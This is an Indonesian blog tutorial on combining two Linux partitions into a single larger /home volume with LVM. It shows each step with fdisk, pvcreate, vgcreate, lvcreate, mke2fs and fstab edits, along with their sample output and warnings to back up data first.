    Tidak demikian bila kita menggunakan LVM. Dengan LVM, harddisk dibagi2 menjadi beberapa level Volume, yaitu Physical Volume, Volume Group, dan Logical Volume. Terlihat rumit? Jangan khawatir, LVM tidak sesulit yang dibayangkan.

    Physical Volume (PV) adalah seperti arti harafiahnya yaitu partisi yang seperti kita kenal yaitu seperti /dev/hda1, /dev/hda2.
    Volume Group (VG) adalah satu atau gabungan dari beberapa buah Physical Volume.
    Logical Volume (LV) adalah volume2 yang kita buat di dalam Volume Group. LV ini nantinya bisa kita mount sesuai keinginan.

    Sekarang bagaimana penerapannya?
    Penulis baru2 ini menghadapi kendala dimana partisi /dev/hda6 yang di mount ke /home telah semakin sedikit free spacenya. Berikut ini adalah kondisi partisi berikut mount point harddisk saya sebelum LVM:

    Filesystem Size Used Avail Use% Mounted on
    /dev/hda5 6.4G 5.4G 617M 90% /
    /dev/hda6 12G 10G 2G 83% /home
    /dev/hda7 7G 3.1G 3.9G 44% /data
    udev 252M 156K 252M 1% /dev
    /dev/hda1 9.9G 7.8G 2.1G 79% /winc
    /dev/hda2 2.0G 1.6G 397M 81% /wind

    Penulis ingin menggabungkan partisi /dev/hda6 dan /dev/hda7 untuk mount point /home. Bagaimana caranya? Dengan menggunakan LVM tentunya.

    Berikut ini adalah langkah2nya:
    • Backup dahulu data2 yang ada di partisi /dev/hda6 (/home) dan /dev/hda7 (data). Sebab kita harus mengubah jenis partisinya menggunakan fdisk sehingga data2 yang ada di kedua partisi tersebut akan hilang. Dalam hal ini penulis membackupnya ke sebuah external usb harddisk.

    • Setelah kita memastikan bahwa data2 telah di backup. Kita akan mulai mengubah jenis partisinya dari ext3 ke LVM (8e). Tapi sebelumnya kita pindah dahulu ke run level 3.
      init 3

    • Di run level ini kita login sebagai root. Mengapa tidak login sebagai user biasa? Sebab /home akan kita matikan. Kalau kita login sebagai user biasa maka kita tidak dapat meng-umount /home.

    • Umount /home dan /data
      umount /home
      umount /data

    • Kita mulai mengubah partisi. Perhatian. Pastikan benar2 bahwa kita tidak salah memilih partisi yang akan kita ubah. Dan juga pastikan bahwa kita telah membackupnya.
      fdisk /dev/hda

      The number of cylinders for this disk is set to 4864.
      There is nothing wrong with that, but this is larger than 1024,
      and could in certain setups cause problems with:
      1) software that runs at boot time (e.g., old versions of LILO)
      2) booting and partitioning software from other OSs
      (e.g., DOS FDISK, OS/2 FDISK)

      Command (m for help):

      t

      Partition number (1-8): 6
      Hex code (type L to list codes): 8e
      Changed system type of partition 6 to 8e (LVM)

      Ubah lagi untuk hda7

      t

      Partition number (1-8): 7
      Hex code (type L to list codes): 8e
      Changed system type of partition 7 to 8e (LVM)

      Setelah itu kita save:
      w

      The partition table has been altered!
      Calling ioctl() to re-read partition table.
      Syncing disks.

    • Kita akan kembali ke prompt. Kernel menyimpan informasi partisi di memory, yang dibaca pada saat booting. Bila kita tidak ingin melakukan booting ulang, maka kita bisa menggunakan command ini untuk memaksa kernel membaca kembali table partisi:
      partprobe

    • Kita cek apakah sudah benar partisinya:
      fdisk -l /dev/hda

      Disk /dev/hda: 40.0 GB, 40007761920 bytes
      255 heads, 63 sectors/track, 4864 cylinders
      Units = cylinders of 16065 * 512 = 8225280 bytes

      Device Boot Start End Blocks Id System
      /dev/hda1 * 1 1281 10289601 7 HPFS/NTFS
      /dev/hda2 1282 1536 2048287+ b W95 FAT32
      /dev/hda3 1537 4864 26732160 5 Extended
      /dev/hda5 1537 2374 6731203+ 83 Linux
      /dev/hda6 2414 3942 12281661 8e Linux LVM <--- sudah berubah
      /dev/hda7 3943 4864 7405933+ 8e Linux LVM <--- sudah berubah
      /dev/hda8 2375 2413 313236 82 Linux swap / Solaris

    • Kita mulai membuat LVMnya:
      Buat PVnya:
      pvcreate /dev/hda6 /dev/hda7

      Physical volume "/dev/hda6" successfully created
      Physical volume "/dev/hda7" successfully created

      Kita dapat melihat statusnya:
      pvdisplay

      --- Physical volume ---
      PV Name /dev/hda6
      VG Name vghome
      PV Size 11.71 GB / not usable 0
      Allocatable yes (but full)
      PE Size (KByte) 4096
      Total PE 2998
      Free PE 0
      Allocated PE 2998
      PV UUID f9IDtR-6Xmo-Hnvu-Ou4T-77rW-nhM9-chIdqG

      --- Physical volume ---
      PV Name /dev/hda7
      VG Name vghome
      PV Size 7.06 GB / not usable 0
      Allocatable yes (but full)
      PE Size (KByte) 4096
      Total PE 1807
      Free PE 0
      Allocated PE 1807
      PV UUID 2oN8gs-B77y-Ks1I-LDnc-KBYX-faEN-tAbYhF

      Buat VGnya:
      vgcreate vghome /dev/hda6 /dev/hda7

      Volume Group "vghome" successfully created

      Kita dapat melihat statusnya:
      vgdisplay

      --- Volume group ---
      VG Name vghome
      System ID
      Format lvm2
      Metadata Areas 2
      Metadata Sequence No 2
      VG Access read/write
      VG Status resizable
      MAX LV 0
      Cur LV 1
      Open LV 1
      Max PV 0
      Cur PV 2
      Act PV 2
      VG Size 18.77 GB
      PE Size 4.00 MB
      Total PE 4805
      Alloc PE / Size 4805 / 18.77 GB
      Free PE / Size 0 / 0
      VG UUID SB7NBc-aqXR-k32e-2K7T-tji8-Y0Nt-6UiLZ4

      Buat LVnya:
      lvcreate -l 4805 -n lvhome vghome

      Logical Volume "lvhome" successfully created

      Dari mana kita tahu angka 4805 ini? Ia adalah banyaknya PE (Physical Extend) yang ada di dalam suatu VG. Dalam hal ini penulis memutuskan untuk memakai seluruh PE yang ada untuk LV lvhome.

      Kita dapat melihat statusnya:
      lvdisplay

      --- Logical volume ---
      LV Name /dev/vghome/lvhome
      VG Name vghome
      LV UUID Fe4kLr-Xn7R-ewnt-5TZj-4iWl-WIPF-S4qOFo
      LV Write Access read/write
      LV Status available
      # open 1
      LV Size 18.77 GB
      Current LE 4805
      Segments 2
      Allocation inherit
      Read ahead sectors 0
      Block device 253:0

    • Setelah membuat LVnya, kini kita dapat memformatnya. Penulis menggunakan ext3.
      mke2fs -j /dev/vghome/lvhome

      mke2fs 1.38 (30-Jun-2005)
      Filesystem label=
      OS type=Linux
      Block size=4096 (log=2)
      Fragment size=4096 (log=2)
      246432 inodes, 4920320 blocks
      246016 blocks (5%) reserved for the super user
      First data block=0
      151 block groups
      32768 blocks per group, 32768 fragments per group
      16320 inodes per group

      writing inode tables: done
      Creating journal (32768 blocks): done

    • Kemudian jangan lupa kita update file /etc/fstab. Hapus baris /dev/hda6 dan /dev/hda7. Kemudian ganti dengan:
      /dev/vghome/lvhome /home ext3 defaults 1 2

    • Kita pastikan bahwa LVM yang kita buat tersebut dapat berjalan dengan baik dengan cara memboot Linux kita.

    • Setelah boot, coba kita lihat apakah /home telah termount dengan baik, dan juga kita cek free spacenya.
      mount

      /dev/hda5 on / type ext3 (rw,acl,user_xattr)
      proc on /proc type proc (rw)
      sysfs on /sys type sysfs (rw)
      debugfs on /sys/kernel/debug type debugfs (rw)
      udev on /dev type tmpfs (rw)
      devpts on /dev/pts type devpts (rw,mode=0620,gid=5)
      /dev/mapper/vghome-lvhome on /home type ext3 (rw) <--- telah termount dengan baik /dev/hda1 on /winc type ntfs (ro,noexec,nosuid,nodev,gid=100,umask=0002,nls=utf8) /dev/hda2 on /wind type vfat (rw,noexec,nosuid,nodev,gid=100,umask=0002,utf8=true) Juga cek free spacenya: df -h

      Filesystem Size Used Avail Use% Mounted on
      /dev/hda5 6.4G 5.4G 618M 90% /
      udev 252M 164K 252M 1% /dev
      /dev/mapper/vghome-lvhome
      19G 12G 5.8G 68% /home <-- telah menjadi 19GB dan setelah kita copy balik data2 ke /home /dev/hda1 9.9G 7.8G 2.1G 79% /winc /dev/hda2 2.0G 1.6G 397M 81% /wind

    • Bandingkan dengan sebelum LVM:

      Filesystem Size Used Avail Use% Mounted on
      /dev/hda5 6.4G 5.4G 617M 90% /
      /dev/hda6 12G 10G 2G 83% /home
      /dev/hda7 7G 3.1G 3.9G 44% /data
      udev 252M 156K 252M 1% /dev
      /dev/hda1 9.9G 7.8G 2.1G 79% /winc
      /dev/hda2 2.0G 1.6G 397M 81% /wind

    • Selesai deeehhh... Kini kita telah berhasil menggabungkan 2 buah partisi menjadi 1 buah 'partisi' yang lebih besar menggunakan LVM.
    Kesimpulan
    Dengan adanya LVM maka management partisi menjadi lebih fleksible. Kapanpun kita membutuhkan space tambahan di salah satu partisi, kita akan dapat selalu memperbesarnya bila kita menggunakan LVM. Ada beberapa variasi yang dapat kita lakukan, seperti dengan sengaja tidak mengalokasikan beberapa persen dari space harddisk kita agar nanti dapat kita pakai bila ada salah satu partisi membutuhkannya, dll. Dengan adanya LVM kita tidak perlu khawatir lagi di dalam bagaimana mempartisi Linux kita.

    LVM adalah produk yang telah cukup matang. Hal ini dapat kita lihat dimana beberapa distro besar telah menjadikannya default dalam installasinya. Jadi bila kamu akan menginstall Linux, bila memungkinkan gunakanlah LVM.

    Merdeka!
    Ilmu Pengetahuan adalah Milik Umat.

    Sumber : Linux@arinet.org
    Read more ...
    Diberdayakan oleh Blogger.
     

    Comment


    ShoutMix chat widget

    Cari Blog Ini

    Google Search

    Top Friends


    GILA LINUX | Template Ireng Manis © 2010 Free Blogger Template Ajah for DheTemplate.com - New Free Blogger Template Everyday